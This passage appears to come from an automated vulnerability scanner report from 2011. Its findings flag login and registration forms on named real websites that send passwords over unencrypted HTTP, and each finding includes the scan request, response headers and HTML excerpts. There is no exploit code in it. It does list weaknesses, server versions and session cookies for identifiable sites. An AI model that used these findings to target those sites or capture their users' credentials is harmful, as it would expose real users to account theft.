<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

6.117. http://www.shape.com/workouts/articles/workout_schedule.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field:

password

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/workout-schedule.html
X-Server-Name: (null)
ETag: "1295922529"
Last-Modified: Tue, 25 Jan 2011 02:28:49 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

6.118. http://www.svenskjoomla.se/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.svenskjoomla.se
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.svenskjoomla.se/index.php?option=com_comprofiler&task=login

The form contains the following password field:

passwd

Request

GET /index.php HTTP/1.1
Host: www.svenskjoomla.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.119. http://www.thefeast.com/boston/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

loginPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</form>

<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />

...[SNIP]...

6.120. http://www.thefeast.com/boston/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

regPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</div>

<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">

<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.121. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

loginPassword

Request

GET /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>

<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />

...[SNIP]...

6.122. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

regPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>

<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">

<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.123. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

regPassword

Request

GET /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>

<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">

<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.124. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

loginPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>

<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />

...[SNIP]...

6.125. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

loginPassword

Request

GET /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>

<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />

...[SNIP]...

6.126. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field:

regPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>

<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">

<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.127. http://www.usaca.info/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usaca.info
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.usaca.info/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3730abe3084fe49ecac82b2df16b8c34=t18frpf95fah7u5jd67rlg4355; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 15-Jan-2012 04:39:36 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 04:39:36 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</h3>
                   <form action="index.php" method="post" name="form-login" id="form-login" >
   USACA Contributor Login:    <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

6.128. http://www.w-w-i.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.w-w-i.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.w-w-i.com/logoffon.php

The form contains the following password field:

pword

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:55 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Online Press Office</title>
<meta name="keywords" content="World Wi
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

6.129. http://www.w-w-i.com/velux_5_oceans_2010_race/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.w-w-i.com
Path:	/velux_5_oceans_2010_race/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.w-w-i.com/velux_5_oceans_2010_race/logoffon.php

The form contains the following password field:

pword

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="/velux_5_oceans_2010_race/logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

6.130. http://www.woothemes.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.woothemes.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.woothemes.com/wp-login.php

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:10:45 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 25957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div><form name="loginform" action="http://www.woothemes.com/wp-login.php" method="post"> <label for="userid" class="fl">
...[SNIP]...
</label> <input class="password fr" type="password" name="pwd" value="" id="password" size="10"/><div class="fix">
...[SNIP]...

6.131. http://www.x64bitdownload.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:30:39 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.132. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-archive-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.133. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-assembling-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.134. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-atom-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.135. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-audio-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.136. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-automatic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.137. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-autoposter-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.138. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-binaries-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.139. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-binary-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.140. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-binary-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.141. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-board-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.142. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-boards-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.143. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.144. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-commander-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.145. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-community-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.146. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

